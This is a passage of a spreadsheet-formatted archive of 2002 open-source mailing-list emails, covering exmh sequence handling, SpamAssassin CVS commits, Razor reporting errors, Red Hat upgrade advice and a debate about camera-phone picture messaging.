heczndJHLLRNAg3S6FTpDw8= =coew -----END PGP SIGNATURE----- --==_Exmh_-195849857P-- _______________________________________________ Exmh-workers mailing list Exmh-workers@redhat.com [URL]https://listman.redhat.com[/URL]</t>
  </si>
  <si>
    <t>https://listman.redhat.com http://www.DeepEddy.Com http://www.virCIO.Com https://listman.redhat.com</t>
  </si>
  <si>
    <t>To: Robert Elz &lt;kre@munnari.OZ.AU&gt;\nFrom: Chris Garrigues &lt;cwg-exmh@DeepEddy.Com&gt;\nDate: Wed, 21 Aug 2002 10:17:14 -0500</t>
  </si>
  <si>
    <t>Wed, 21 Aug 2002 10:17:14 -0500</t>
  </si>
  <si>
    <t>--==_Exmh_-196335410P Content-Type: text/plain; charset=us-ascii &gt; From:  Robert Elz  &gt; Date:  Wed, 21 Aug 2002 15:01:07 +0700 &gt; &gt;     Date:        Tue, 20 Aug 2002 22:51:52 -0400 &gt;     From:        Valdis.Kletnieks@vt.edu &gt;     Message-ID:  &lt;200208210251.g7L2pqKb001805@turing-police.cc.vt.edu&gt; &gt;  &gt;   | Ever tried to get MH to *not* have a 'pseq' sequence? &gt;  &gt; Hmm - I've been using MH for a long time (since well before there were &gt; sequences) and I don't think I've ever seen a "pseq" ... &gt;  &gt; I'm guessing that that's the sequence that you have "pick" create &gt; As I recall it, it has no default sequence name, so the sequence names &gt; that people use will tend to vary from person to person won't they &gt; (except as MH configurations move around institutions by osmosis). &gt;  &gt; I've always used "sel" for that purpose. &gt;  &gt; I kind of doubt that any pre built-in sequence name is going to be &gt; very general.   Even "unseen" can be changed (fortunately that one &gt; is easy to find in the MH profile - though whether exmh does that, &gt; os just uses "unseen" I haven't bothered to find out). I've never seen pseq either. BTW, it's kinda amusing for a short while to show the cur sequence.  Watching  that helped me find a number of bugs. Chris --  Chris Garrigues                 [URL]http://www.DeepEddy.Com[/URL] virCIO                          [URL]http://www.virCIO.Com[/URL] 716 Congress, Suite 200 Austin, TX  78701		+1 512 374 0500   World War III:  The Wrong-Doers Vs. the Evil-Doers. --==_Exmh_-196335410P Content-Type: application/pgp-signature -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.6 (GNU/Linux) Comment: Exmh version 2.2_20000822 06/23/2000 iD8DBQE9Y676K9b4h5R0IUIRAt/rAJ9huaTFeBLHluu/vhFc1GWy3X+YywCgh0XF o7+XfPSIQbz9hkFFBMTYd1k= =969s -----END PGP SIGNATURE----- --==_Exmh_-196335410P-- _______________________________________________ Exmh-workers mailing list Exmh-workers@redhat.com [URL]https://listman.redhat.com[/URL]</t>
  </si>
  <si>
    <t>To: Valdis.Kletnieks@vt.edu\nFrom: Chris Garrigues &lt;cwg-exmh@DeepEddy.Com&gt;\nDate: Wed, 21 Aug 2002 10:15:18 -0500</t>
  </si>
  <si>
    <t>Wed, 21 Aug 2002 10:15:18 -0500</t>
  </si>
  <si>
    <t>--==_Exmh_-199405358P\nContent-Type: text/plain; charset=us-ascii\n\n&gt; From:  Valdis.Kletnieks@vt.edu\n&gt; Date:  Wed, 21 Aug 2002 02:36:56 -0400\n&gt;\n&gt; --==_Exmh_778588528P\n&gt; Content-Type: text/plain; charset=us-ascii\n&gt; \n&gt; On Tue, 20 Aug 2002 22:51:52 EDT, Valdis.Kletnieks@vt.edu said:\n&gt; \n&gt; &gt; Ever tried to get MH to *not* have a 'pseq' sequence?  I suspect everybod\n&gt; y's\n&gt; &gt; looking at a big box that has unseen and pseq in it.  Might want to add\n&gt; &gt; 'pseq' to the 'hide by default' list....\n&gt; \n&gt; Was it intended that if you added a sequence to the 'never show' list that\n&gt; it not take effect till you stopped and restarted exmh?  I added 'pseq',\n&gt; then hit 'save' for Preferences - didn't take effect till I restarted.\n\nNo it wasn't, and at one point it worked fine.  I'll check and see why it \nstopped working.\n\nChris\n-- \nChris Garrigues                 [URL]http://www.DeepEddy.Com[/URL]\nvirCIO                          [URL]http://www.virCIO.Com[/URL]\n716 Congress, Suite 200\nAustin, TX  78701		+1 512 374 0500\n\n  World War III:  The Wrong-Doers Vs. the Evil-Doers.\n\n\n\n\n--==_Exmh_-199405358P\nContent-Type: application/pgp-signature\n\n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1.0.6 (GNU/Linux)\nComment: Exmh version 2.2_20000822 06/23/2000\n\niD8DBQE9Y66GK9b4h5R0IUIRAsIYAJ4zEJm2B6tIQDD4MQu7LbapzZpAsgCcCJtl\nbDfb8a2wKMtAgWylF44XooU=\n=WC8I\n-----END PGP SIGNATURE-----\n\n--==_Exmh_-199405358P--\n\n\n\n_______________________________________________\nExmh-workers mailing list\nExmh-workers@redhat.com\n[URL]https://listman.redhat.com[/URL]</t>
  </si>
  <si>
    <t>To: spamassassin-commits@example.sourceforge.net\nFrom: Justin Mason &lt;yyyyason@users.sourceforge.net&gt;\nDate: Wed, 21 Aug 2002 09:32:58 -0700</t>
  </si>
  <si>
    <t>Wed, 21 Aug 2002 09:32:58 -0700</t>
  </si>
  <si>
    <t>[SACVS] CVS: spamassassin/wordfreqs RUNME,1.1,1.1.4.1</t>
  </si>
  <si>
    <t>Update of /cvsroot/spamassassin/spamassassin/wordfreqs\nIn directory usw-pr-cvs1:/tmp/cvs-serv17442/wordfreqs\n\nModified Files:\n      Tag: b2_4_0\n	RUNME \nLog Message:\nadded a warning for ISPs in required_hits manual entry\n\nIndex: RUNME\n===================================================================\nRCS file: /cvsroot/spamassassin/spamassassin/wordfreqs/RUNME,v\nretrieving revision 1.1\nretrieving revision 1.1.4.1\ndiff -b -w -u -d -r1.1 -r1.1.4.1\n--- RUNME	15 Jan 2002 05:34:18 -0000	1.1\n+++ RUNME	21 Aug 2002 16:32:55 -0000	1.1.4.1\n@@ -13,17 +13,20 @@\n \n mv spam.local nonspam.local logs/old\n \n-./mass-phrase-freq /local2/mail-archives/scoop.1999.gz &gt;&gt; nonspam.local\n-./mass-phrase-freq /local2/mail-archives/oldmail.1998.gz &gt;&gt; nonspam.local\n-\n ./mass-phrase-freq-for-jm ; sh commands.sh\n \n-for f in /local2/mail-archives/crackmice-old/* ; do\n-  ./mass-phrase-freq $f &gt;&gt; nonspam.local\n+for f in /local/mail-archives/recent/nonspam/* ; do\n+  echo Checking $f: ; ./mass-phrase-freq $f  &gt;&gt; nonspam.local\n done\n \n-./mass-phrase-freq /local2/mail-archives/kelsey.spamtrap.gz &gt;&gt; spam.local\n-./mass-phrase-freq /local2/mail-archives/spam.2000-2001.gz &gt;&gt; spam.local\n+./mass-phrase-freq /local/mail-archives/recent/spamtrap/20020717/nonspam.mbox &gt;&gt; nonspam.local\n+\n+./mass-phrase-freq /local/mail-archives/recent/spamtrap/20020717/mbox &gt;&gt; spam.local\n+\n+for f in /local/mail-archives/old/nonspam/* /local/mail-archives/recent/nonspam/*\n+do\n+  echo Checking $f: ; ./mass-phrase-freq $f &gt;&gt; nonspam.local\n+done\n \n echo "\n \n\n\n\n-------------------------------------------------------\nThis sf.net email is sponsored by: OSDN - Tired of that same old\ncell phone?  Get a new here for FREE!\n[URL]https://www.inphonic.com[/URL]\n_______________________________________________\nSpamassassin-commits mailing list\nSpamassassin-commits@lists.sourceforge.net\n[URL]https://lists.sourceforge.net[/URL]</t>
  </si>
  <si>
    <t>To: spamassassin-commits@example.sourceforge.net\nFrom: Justin Mason &lt;yyyyason@users.sourceforge.net&gt;\nDate: Wed, 21 Aug 2002 09:32:57 -0700</t>
  </si>
  <si>
    <t>Wed, 21 Aug 2002 09:32:57 -0700</t>
  </si>
  <si>
    <t>[SACVS] CVS: spamassassin/lib/Mail/SpamAssassin Conf.pm,1.91.2.2,1.91.2.3</t>
  </si>
  <si>
    <t>Update of /cvsroot/spamassassin/spamassassin/lib/Mail/SpamAssassin In directory usw-pr-cvs1:/tmp/cvs-serv17442/lib/Mail/SpamAssassin Modified Files:       Tag: b2_4_0 	Conf.pm  Log Message: added a warning for ISPs in required_hits manual entry Index: Conf.pm =================================================================== RCS file: /cvsroot/spamassassin/spamassassin/lib/Mail/SpamAssassin/Conf.pm,v retrieving revision 1.91.2.2 retrieving revision 1.91.2.3 diff -b -w -u -d -r1.91.2.2 -r1.91.2.3 --- Conf.pm	21 Aug 2002 16:27:27 -0000	1.91.2.2 +++ Conf.pm	21 Aug 2002 16:32:55 -0000	1.91.2.3 @@ -396,7 +396,11 @@  =item required_hits n.nn   (default: 5)    Set the number of hits required before a mail is considered spam.  C can -be an integer or a real number. +be an integer or a real number.  5.0 is the default setting, and is quite +aggressive; it would be suitable for a single-user setup, but if you're an ISP +installing SpamAssassin, you should probably set the default to be something +much more conservative, like 8.0 or 10.0.  Experience has shown that you +B get plenty of user complaints otherwise!    =cut   ------------------------------------------------------- This sf.net email is sponsored by: OSDN - Tired of that same old cell phone?  Get a new here for FREE! [URL]https://www.inphonic.com[/URL] _______________________________________________ Spamassassin-commits mailing list Spamassassin-commits@lists.sourceforge.net [URL]https://lists.sourceforge.net[/URL]</t>
  </si>
  <si>
    <t>To: spamassassin-commits@example.sourceforge.net\nFrom: "Malte S. Stretz" &lt;msquadrat@users.sourceforge.net&gt;\nDate: Wed, 21 Aug 2002 09:27:29 -0700</t>
  </si>
  <si>
    <t>Wed, 21 Aug 2002 09:27:29 -0700</t>
  </si>
  <si>
    <t>"Malte S. Stretz" &lt;msquadrat@users.sourceforge.net&gt;</t>
  </si>
  <si>
    <t>[SACVS] CVS: spamassassin/lib/Mail/SpamAssassin Conf.pm,1.91.2.1,1.91.2.2</t>
  </si>
  <si>
    <t>Update of /cvsroot/spamassassin/spamassassin/lib/Mail/SpamAssassin\nIn directory usw-pr-cvs1:/tmp/cvs-serv13785\n\nModified Files:\n      Tag: b2_4_0\n	Conf.pm \nLog Message:\nrestricted version_tag\n\nIndex: Conf.pm\n===================================================================\nRCS file: /cvsroot/spamassassin/spamassassin/lib/Mail/SpamAssassin/Conf.pm,v\nretrieving revision 1.91.2.1\nretrieving revision 1.91.2.2\ndiff -b -w -u -d -r1.91.2.1 -r1.91.2.2\n--- Conf.pm	21 Aug 2002 16:02:13 -0000	1.91.2.1\n+++ Conf.pm	21 Aug 2002 16:27:27 -0000	1.91.2.2\n@@ -263,6 +263,7 @@\n \n     if(/^version[-_]tag\s+(.*)$/) {\n       my $tag = lc($1);\n+      $tag =~ tr/a-z0-9./_/c;\n       foreach (@Mail::SpamAssassin::EXTRA_VERSION) {\n         if($_ eq $tag) {\n           $tag = undef;\n\n\n\n-------------------------------------------------------\nThis sf.net email is sponsored by: OSDN - Tired of that same old\ncell phone?  Get a new here for FREE!\n[URL]https://www.inphonic.com[/URL]\n_______________________________________________\nSpamassassin-commits mailing list\nSpamassassin-commits@lists.sourceforge.net\n[URL]https://lists.sourceforge.net[/URL]</t>
  </si>
  <si>
    <t>To: spamassassin-commits@example.sourceforge.net\nFrom: "Malte S. Stretz" &lt;msquadrat@users.sourceforge.net&gt;\nDate: Wed, 21 Aug 2002 09:27:09 -0700</t>
  </si>
  <si>
    <t>Wed, 21 Aug 2002 09:27:09 -0700</t>
  </si>
  <si>
    <t>[SACVS] CVS: spamassassin/lib/Mail/SpamAssassin Conf.pm,1.92,1.93</t>
  </si>
  <si>
    <t>Update of /cvsroot/spamassassin/spamassassin/lib/Mail/SpamAssassin\nIn directory usw-pr-cvs1:/tmp/cvs-serv13563/lib/Mail/SpamAssassin\n\nModified Files:\n	Conf.pm \nLog Message:\nrestricted version_tag\n\nIndex: Conf.pm\n===================================================================\nRCS file: /cvsroot/spamassassin/spamassassin/lib/Mail/SpamAssassin/Conf.pm,v\nretrieving revision 1.92\nretrieving revision 1.93\ndiff -b -w -u -d -r1.92 -r1.93\n--- Conf.pm	21 Aug 2002 16:01:08 -0000	1.92\n+++ Conf.pm	21 Aug 2002 16:27:06 -0000	1.93\n@@ -263,6 +263,7 @@\n \n     if(/^version[-_]tag\s+(.*)$/) {\n       my $tag = lc($1);\n+      $tag =~ tr/a-z0-9./_/c;\n       foreach (@Mail::SpamAssassin::EXTRA_VERSION) {\n         if($_ eq $tag) {\n           $tag = undef;\n\n\n\n-------------------------------------------------------\nThis sf.net email is sponsored by: OSDN - Tired of that same old\ncell phone?  Get a new here for FREE!\n[URL]https://www.inphonic.com[/URL]\n_______________________________________________\nSpamassassin-commits mailing list\nSpamassassin-commits@lists.sourceforge.net\n[URL]https://lists.sourceforge.net[/URL]</t>
  </si>
  <si>
    <t>To: yyyy@spamassassin.taint.org\nFrom: Thomas Anders &lt;anders@hmi.de&gt;\nDate: Wed, 21 Aug 2002 08:54:56 +0200</t>
  </si>
  <si>
    <t>Wed, 21 Aug 2002 08:54:56 +0200</t>
  </si>
  <si>
    <t>Thomas Anders &lt;anders@hmi.de&gt;</t>
  </si>
  <si>
    <t>Re: [Bug 704] spamd doesn't remove pid file on shutdown when running as non-root user</t>
  </si>
  <si>
    <t>bugzilla-daemon@hughes-family.org wrote: &gt; [URL]http://www.hughes-family.org[/URL] &gt; ok, this is now fixed. cheers! How did you fix it? By creating the pidfile as the "-u" user? If so, you should add this to the documentation since it prevents the use of the standard /var/run directory (which is only writable by root). +Thomas --  Thomas Anders  Hahn-Meitner-Institut Berlin, Germany</t>
  </si>
  <si>
    <t>http://www.hughes-family.org</t>
  </si>
  <si>
    <t>To: rpm-zzzlist@freshrpms.net\nFrom: Brian Fahrlander &lt;kilroy@kamakiriad.com&gt;\nDate: Wed, 21 Aug 2002 04:08:52 -0500</t>
  </si>
  <si>
    <t>Wed, 21 Aug 2002 04:08:52 -0500</t>
  </si>
  <si>
    <t>On Wed, 21 Aug 2002 10:38:04 +0200, Matthias Saou  wrote: &gt; This is a beta, probably of 8.0 although it's numbered 7.3.94. As such, &gt; I've set up no apt repository for it, although you may find a few of my &gt; packages recompiled for it under the /pub/freshrpms/null/ directory of my &gt; ftp server.     Ah; ok.  I'll wait.  I've got enough bugs to swat, but I really look forward to it.  Every version before now has seemed to have been bugfixes and meaningful upgrades of subtle stuff; I expect this one to be the "no excuses to run Windows" release to which I can point the unwashed hordes.       :) ------------------------------------------------------------------------ Brian Fahrlnder              Linux Zealot, Conservative, and Technomad Evansville, IN                    My Voyage: [URL]http://www.CounterMoon.com[/URL] ICQ  5119262 ------------------------------------------------------------------------ I've been complaining for years, and almost no one listened. "Windows is just easier" you said. "I don't want to learn anything new", you said. Tell me how easy THIS is: [URL]http://www.guardian.co.uk[/URL],4273,4477138,00.html _______________________________________________ RPM-List mailing list  [URL]http://lists.freshrpms.net[/URL]</t>
  </si>
  <si>
    <t>http://www.CounterMoon.com http://www.guardian.co.uk http://lists.freshrpms.net</t>
  </si>
  <si>
    <t>To: nan\nFrom: Valdis.Kletnieks@vt.edu\nDate: Wed, 21 Aug 2002 02:36:56 -0400</t>
  </si>
  <si>
    <t>Wed, 21 Aug 2002 02:36:56 -0400</t>
  </si>
  <si>
    <t>--==_Exmh_778588528P\nContent-Type: text/plain; charset=us-ascii\n\nOn Tue, 20 Aug 2002 22:51:52 EDT, Valdis.Kletnieks@vt.edu said:\n\n&gt; Ever tried to get MH to *not* have a 'pseq' sequence?  I suspect everybody's\n&gt; looking at a big box that has unseen and pseq in it.  Might want to add\n&gt; 'pseq' to the 'hide by default' list....\n\nWas it intended that if you added a sequence to the 'never show' list that\nit not take effect till you stopped and restarted exmh?  I added 'pseq',\nthen hit 'save' for Preferences - didn't take effect till I restarted.\n\n--==_Exmh_778588528P\nContent-Type: application/pgp-signature\n\n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1.0.7 (GNU/Linux)\nComment: Exmh version 2.5 07/13/2001\n\niD8DBQE9YzUIcC3lWbTT17ARAkTxAJ980YijxjLdlJABtcs4uJwQwN0EnwCdHjOG\ntFqGIQwIX8IwCFsDpTRtqw0=\n=oMZd\n-----END PGP SIGNATURE-----\n\n--==_Exmh_778588528P--\n\n\n\n_______________________________________________\nExmh-workers mailing list\nExmh-workers@redhat.com\n[URL]https://listman.redhat.com[/URL]</t>
  </si>
  <si>
    <t>To: "'Mike Masnick'" &lt;mike@techdirt.com&gt;\nFrom: "Rob Shavell" &lt;rob@mobiusvc.com&gt;\nDate: Wed, 21 Aug 2002 01:10:50 -0700</t>
  </si>
  <si>
    <t>Wed, 21 Aug 2002 01:10:50 -0700</t>
  </si>
  <si>
    <t>"Rob Shavell" &lt;rob@mobiusvc.com&gt;</t>
  </si>
  <si>
    <t>"'Mike Masnick'" &lt;mike@techdirt.com&gt;</t>
  </si>
  <si>
    <t>RE: sprint delivers the next big thing??</t>
  </si>
  <si>
    <t>right Mike,\n\ni will agree to disagree but i take your comments to heart.  my opinion is\nonly that this is one of the last frontiers of communications ('instant\nshow') that we cross easily (though you are right as rain on pricing).  i am\nmildly amused at the level of skepticism and innatention it is getting.\n\nmy premise is that the world will change in dramatic and unexpected ways\nonce there are a billion 'eye's' which can instantly share what they see\namongst each other.  that doesn't mean that people will stop talking on\ntheir phones, or that people will spend more time w/images than voice.  just\nthat it is fundamental.  from news to crime to privacy to dating to family\nlife to bloopers and practical jokes, i believe there will be an explosion\nof images unleashed specifically by cell phone integrated lenses because of\ntheir utter ubiquity that dwarfs all pictures taken in the history of\nphotography by orders of magnitude and in short order. and yes, changes\nthings 'big time'.\n\nrgds,\nrob\n\n\n-----Original Message-----\nFrom: Mike Masnick [mailto:mike@techdirt.com]\nSent: Tuesday, August 20, 2002 11:58 PM\nTo: Rob Shavell\nCc: fork@spamassassin.taint.org\nSubject: RE: sprint delivers the next big thing??\n\n\nNot to keep harping on this, but...\n\nAt 11:36 PM 8/20/02 -0700, Rob Shavell wrote:\n\n&gt;content: who cares about content?  that no one can think of 'useful'\ncontent\n&gt;is always the business persons mistake. the content is the users\n&gt;communications.  its anything and everything.  avg person could easily send\n&gt;half dozen pics to a dozen people a day.  mainly humorous i'd guess. who\n&gt;cares if content is trivial in nature. picture speaks a thousand words.\n\nThis does nothing to answer my question.  I *do* care about content.  Hell,\nif I could be convinced that people would send stupid pics back and forth\nall day, I'd have a different opinion of this.  I just am not convinced\nthat they will (stupid or not).\n\nWhile a picture may be worth a thousand words (and this is the same\nargument the guy who works for me made), how many people do you know who\ncommunicate by pictures?  Sure, it sounds nice to say that a picture is\nsuch an efficient messaging mechanism, but how often do you actually find\nyourself drawing someone a picture to explain something?\n\nI don't buy it.\n\nFor most messages, text works fine and is the most efficient\nmechanism.  For some messages, pictures do the job, but I would say not\nnearly as often as words.  Why do you think Pictionary and Charades and\nsuch are games?  Because images are usually not the most efficient way to\nget a message across.\n\n&gt;misc ramblings: i suppose you skeptical forkers would have said the same\n&gt;thing about '1 hour photo' processing.  trivial, who needs it, i get better\n&gt;resultion elswhere.  and yet, it had great decentralizing impact - the\nplant\n&gt;had to be downsized and pushed to the retail operation - the digital\ncamera,\n&gt;and finally the integrated digital camera phone brings this cycle of\n&gt;decentralization in photography to a logical conclusion (which will put the\n&gt;photo giants to bed) and change the world in a meaningful way.  also, SMS\n&gt;didn't take off because its easy, it took off because it costs less.  its\n&gt;greatly ironic the carriers often trumpet the 'profitabilty' of their SMS\n&gt;traffic over others because of its ratio of cost to bandwidth.  in reality,\n&gt;SMS cannibilizes the voice rev's they bought their networks to handle.\n\nAgain, this is the same argument my colleague made (along with "you just\ndon't understand kids today, and they'll run with this").  I wasn't saying\nthat MMS wouldn't take off because it wasn't high quality or that it wasn't\neasy.  I was saying that I couldn't see why people would use it in a way\nthat "changed the face of communications".\n\nI'm looking for the compelling reason (even if it's a stupid one) why\npeople would want to do this.  Sure, if they integrate cameras into the\nphone, and the quality improves (even only marginally) I can certainly see\npeople taking pictures with their cameras and occasionally sending them to\nother people.  But, mostly, I don't see what the benefit is to this over\nsending them to someone's email address, or putting together an online (or\noffline) photoalbum.\n\nI don't think 1 hour photos are trivial.  People want to see their own pics\nright away, and the quality is plenty good enough for snapshots.  That's\none of the main reasons why digital cameras are catching on.  The instant\nview part.  I'm guessing your argument is that people not only want\n"instant view", but also "instant show".  Which is what this service\noffers.  I'm not convinced that most people want "instant show".  I think\npeople like to package their pictures and show them.  That's why people put\ntogether fancy albums, and sit there and force you to go through them while\nthey explain every picture.  Sure, occasionally "instant show" is nice, but\nit's just "nice" on occasion.  I still can't see how it becomes a integral\nmessaging method.\n\nWhat's the specific benefit of taking a picture and immediately sending it\nfrom one phone to another?  There has to be *some* benefit, even if it's\nsilly if people are going to flock to it.\n\nI'm searching... no one has given me a straight answer yet.\n\nThe *only* really intriguing idea I've heard about things like MMS lately\nare Dan Gillmor's assertion that one day in the near future some news event\nwill happen, and a bunch of people will snap pictures with their mobile\nphones, from all different angles, and those photos tell the real story of\nwhat happened - before the press even gets there.\n\nWilling to be proven wrong,\nMike\n\nPS If the wireless carriers continue to price these services as stupidly as\nthey currently are, then MMS is *never* going to catch on.\n\n[URL]http://xent.com[/URL]</t>
  </si>
  <si>
    <t>To: &lt;razor-users@example.sourceforge.net&gt;\nFrom: "Rose, Bobby" &lt;brose@med.wayne.edu&gt;\nDate: Wed, 2 Oct 2002 23:59:01 -0400</t>
  </si>
  <si>
    <t>Wed, 2 Oct 2002 23:59:01 -0400</t>
  </si>
  <si>
    <t>RE: [Razor-users] Fire.cloudmark.com is having issues</t>
  </si>
  <si>
    <t>What does this mean?  I set up procmailrc for a spamtrap but I'm getting\nan error.  I also am reporting to pyzor and dcc and they aren't\nregistering an error.  What's weird is that it works sometimes.\n\n.\nOct 02 23:46:11.470523 report[14051]: [ 4] honor.cloudmark.com &gt;&gt; 20\nOct 02 23:46:11.470805 report[14051]: [ 6] response to sent.3\n-res=1\nerr=230\n.\nOct 02 23:46:11.471825 report[14051]: [ 5] mail 1, orig_email, special\ncase eng 1: Server accept\ned report.\nOct 02 23:46:11.472228 report[14051]: [ 8] mail 1.0, eng 4: err 230 -\nserver wants mail\n\n\n-------------------------------------------------------\nThis sf.net email is sponsored by:ThinkGeek\nWelcome to geek heaven.\n[URL]http://thinkgeek.com[/URL]\n_______________________________________________\nRazor-users mailing list\nRazor-users@lists.sourceforge.net\n[URL]https://lists.sourceforge.net[/URL]</t>
  </si>
  <si>
    <t>To: rpm-zzzlist@freshrpms.net\nFrom: Matthias Saou &lt;matthias@rpmforge.net&gt;\nDate: Wed, 2 Oct 2002 22:46:20 +0200</t>
  </si>
  <si>
    <t>Wed, 2 Oct 2002 22:46:20 +0200</t>
  </si>
  <si>
    <t>Re: use new apt to do null to RH8 upgrade?</t>
  </si>
  <si>
    <t>Once upon a time, ""Angles" wrote : &gt; Matthias Saou (matthias@egwn.net) wrote*: &gt; &gt;You're really better off backuping all placed where you know you've hand &gt; &gt;edited or installed some files. For me that's only /etc/, /root/ and &gt; &gt;/home/. Then you reinstall cleanly, formating "/", put your /home/ files &gt; &gt;back into place and you're ready to go. &gt;  &gt; Matthias I gotta believe you, I've been using your RPMs for some time now &gt; :) That's the way I'll do it. I'm no "messiah", just do what you think suits you the best :-) Matthias --  Clean custom Red Hat Linux rpm packages : [URL]http://freshrpms.net[/URL] Red Hat Linux release 7.3 (Valhalla) running Linux kernel 2.4.18-10acpi Load : 0.05 0.06 0.03 _______________________________________________ RPM-List mailing list  [URL]http://lists.freshrpms.net[/URL]</t>
  </si>
  <si>
    <t>To: rpm-zzzlist@freshrpms.net\nFrom: Matthias Saou &lt;matthias@rpmforge.net&gt;\nDate: Wed, 2 Oct 2002 22:45:04 +0200</t>
  </si>
  <si>
    <t>Wed, 2 Oct 2002 22:45:04 +0200</t>
  </si>
  <si>
    <t>Re: alsa-driver.spec tweak for homemade kernels</t>
  </si>
  <si>
    <t>Once upon a time, Gary wrote : &gt; On Wed, Oct 02, 2002 at 10:09:19AM +0200, Matthias Saou wrote: &gt; &gt; Well, I don't really find it consistent at all to use an rpm package &gt; &gt; built against something that wasn't installed through rpm :-/ &gt;  &gt; Following that reasoning, I've been installing all my custom-built &gt; kernels through rpm recently. I find it annoying, though, that  &gt; alsa-kernel, and similar packages, will only build for the currently  &gt; running kernel. &gt;  &gt; So I've attached a patch to specify an alternate kernel by setting the &gt; "TARGET_KERNEL" environment variable before running rpmbuild. You &gt; still need to have the rpm for the specified kernel installed, but at &gt; least it doesn't have to be currently running. It's kinda hackish, so &gt; if someone has a better way to do this, let me know. That idea looks good although it maybe needs to be tweaked a bit more (what you sent doesn't support packages named "kernel-smp"). I'd also prefer a cleaner way than the env variable, and preferrably not editing the spec... probably "--define 'target 2.4.xx-xx' --with smp". Sound good enough? The BuildRequires on "kernel-source" will also need to be removed because it won't necessarily need to be true, and that does bug me a bit :-/ More ideas are welcome. Matthias --  Clean custom Red Hat Linux rpm packages : [URL]http://freshrpms.net[/URL] Red Hat Linux release 7.3 (Valhalla) running Linux kernel 2.4.18-10acpi Load : 0.08 0.06 0.03 _______________________________________________ RPM-List mailing list  [URL]http://lists.freshrpms.net[/URL]</t>
  </si>
  <si>
    <t>To: "Rose, Bobby" &lt;brose@med.wayne.edu&gt;\nFrom: Jordan Ritter &lt;jpr5@darkridge.com&gt;\nDate: Wed, 2 Oct 2002 22:20:49 -0700</t>
  </si>
  <si>
    <t>Wed, 2 Oct 2002 22:20:49 -0700</t>
  </si>
  <si>
    <t>Jordan Ritter &lt;jpr5@darkridge.com&gt;</t>
  </si>
  <si>
    <t>Re: [Razor-users] Fire.cloudmark.com is having issues</t>
  </si>
  <si>
    <t>--CE+1k2dSO48ffgeK\nContent-Type: text/plain; charset=us-ascii\nContent-Disposition: inline\nContent-Transfer-Encoding: quoted-printable\n\nError 230 occurs when you report a signature, but the server doesn't\nknow about the signature, so it wants the full content.  It's\nbasically an optimization. =20\n\nBeyond that, I'm not sure how to interpret that output.. what version?\nVipul?\n\n--jordan\n\nOn Wed, Oct 02, 2002 at 11:59:01PM -0400, Rose, Bobby wrote:\n# What does this mean?  I set up procmailrc for a spamtrap but I'm getting\n# an error.  I also am reporting to pyzor and dcc and they aren't\n# registering an error.  What's weird is that it works sometimes.\n#=20\n# .\n# Oct 02 23:46:11.470523 report[14051]: [ 4] honor.cloudmark.com &gt;&gt; 20\n# Oct 02 23:46:11.470805 report[14051]: [ 6] response to sent.3\n# -res=3D1\n# err=3D230\n# .\n# Oct 02 23:46:11.471825 report[14051]: [ 5] mail 1, orig_email, special\n# case eng 1: Server accept\n# ed report.\n# Oct 02 23:46:11.472228 report[14051]: [ 8] mail 1.0, eng 4: err 230 -\n# server wants mail\n#=20\n#=20\n# -------------------------------------------------------\n# This sf.net email is sponsored by:ThinkGeek\n# Welcome to geek heaven.\n# [URL]http://thinkgeek.com[/URL]\n# _______________________________________________\n# Razor-users mailing list\n# Razor-users@lists.sourceforge.net\n# [URL]https://lists.sourceforge.net[/URL]\n\n--CE+1k2dSO48ffgeK\nContent-Type: application/pgp-signature\nContent-Disposition: inline\n\n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1.2.0 (GNU/Linux)\n\niD8DBQE9m9OxpwQdAVEbU7oRAifiAKCSXxSTb64bYgzo8PiXVVswqkXCKgCgnqby\nYYrMsnaQOrQvEb7cDw5jios=\n=SBk3\n-----END PGP SIGNATURE-----\n\n--CE+1k2dSO48ffgeK--\n\n\n-------------------------------------------------------\nThis sf.net email is sponsored by:ThinkGeek\nWelcome to geek heaven.\n[URL]http://thinkgeek.com[/URL]\n_______________________________________________\nRazor-users mailing list\nRazor-users@lists.sourceforge.net\n[URL]https://lists.sourceforge.net[/URL]</t>
  </si>
  <si>
    <t>To: &lt;razor-users@example.sourceforge.net&gt;\nFrom: "Rose, Bobby" &lt;brose@med.wayne.edu&gt;\nDate: Wed, 2 Oct 2002 18:58:06 -0400</t>
  </si>
  <si>
    <t>Wed, 2 Oct 2002 18:58:06 -0400</t>
  </si>
  <si>
    <t>[Razor-users] Fire.cloudmark.com is having issues</t>
  </si>
  <si>
    <t>I noticed a drop in checks, and did some tests.  If I move truth up in\nmy catalog list, a check comes back postive, but if I move fire up in\nthe list, then I don't get the positive check back.  It's almost like\nit's not syncing up with Hubris which is the one my reports are getting\nsent to.\n\n-=Bobby\n\n\n-------------------------------------------------------\nThis sf.net email is sponsored by:ThinkGeek\nWelcome to geek heaven.\n[URL]http://thinkgeek.com[/URL]\n_______________________________________________\nRazor-users mailing list\nRazor-users@lists.sourceforge.net\n[URL]https://lists.sourceforge.net[/URL]</t>
  </si>
  <si>
    <t>To: rpm-zzzlist@freshrpms.net\nFrom: Matthias Saou &lt;matthias@egwn.net&gt;\nDate: Wed, 2 Oct 2002 18:57:28 +0200</t>
  </si>
  <si>
    <t>Wed, 2 Oct 2002 18:57:28 +0200</t>
  </si>
  <si>
    <t>Once upon a time, ""Angles" wrote : &gt; When I went all "Open Source", I stopped using my old partioning app &gt; (partition magic?). For the RH7 install I used FIPS (a couple times). &gt; Then ext3 came out and my old commercial partioning app is real old, so I &gt; ask what OS software can non-destructively repartition a HD so I can put &gt; /home on a seperate partition now? Parted is your friend! You can't do _everything_, the most limiting being that you can't move the start of a partition, but it's quite powerful nevertheless, and I've been very happy with it the few times I've had to use it. &gt; &gt;If you didn't put /home on a separate partition, &gt;  &gt; With winbloze 9x I used to deltree the winbloze dir and some "Program &gt; Files" dirs, and install "fresh" instead of upgrade, while saving my &gt; other data. Can this trick be used with this RH8 upgrade? Example rpm -e &gt; everything so all packages are gone, hit "reset" button and boot to &gt; redhat CDROM in admin (rescue?) mode, delete all those config files left, &gt; like "/etc/*", then do an install BUT NOT FORMAT THAT SINGLE PARTITION &gt; that I'm installing on. If I can hack the details, is this theory &gt; accurate, or will RH want to destructively install and elimate all &gt; existing files? You're really better off backuping all placed where you know you've hand edited or installed some files. For me that's only /etc/, /root/ and /home/. Then you reinstall cleanly, formating "/", put your /home/ files back into place and you're ready to go. That's the moment I usually realize I had a nifty tweak to a file in /etc/sysconfig/network-scripts/ or some special parameters added to an /etc/modules.conf entry... 